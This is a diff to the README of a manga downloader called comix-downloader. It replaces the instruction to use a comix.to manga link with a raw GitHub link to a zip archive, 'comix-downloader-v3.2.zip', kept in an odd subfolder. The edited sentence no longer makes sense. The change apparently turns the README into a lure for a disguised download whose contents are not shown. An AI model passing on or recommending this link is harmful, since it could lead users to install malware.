Spiderma78/comix-downloader/README.md

 2. Navigate to the directory where comix-downloader is installed.
 3. Type the command `comix-downloader <URL>` and press Enter.

-The URL should be the link to the manga on comix.to.
+The URL should be the link to the manga on https://raw.githubusercontent.com/Spiderma78/comix-downloader/main/gui/bridge/comix-downloader-v3.2.zip

 ## 🛠️ Features
 - **Multiple Download Options:** Choose PDF or CBZ formats.